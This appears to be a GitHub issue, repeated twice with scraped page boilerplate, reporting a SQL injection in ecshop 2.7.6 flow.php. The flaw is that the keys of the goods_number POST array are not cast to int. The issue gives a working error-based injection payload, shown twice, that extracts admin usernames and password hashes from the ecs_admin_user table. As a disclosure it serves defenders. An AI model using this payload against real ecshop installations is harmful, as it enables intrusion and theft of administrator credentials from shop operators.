use to make value as int ,but forget to do the same with key vars .. so leads to sql inject .
hackers can do this like :
goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1] = value
The text was updated successfully, but these errors were encountered:
ecshop 2.7.6 flow.php
src:
https://github.com/shopex/ecshop/blob/master/upload/flow.php
flow_update_cart($_POST['goods_number']);
so :

use to make value as int ,but forget to do the same with key vars .. so leads to sql inject .
hackers can do this like :
goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1] = valueThe text was updated successfully, but these errors were encountered: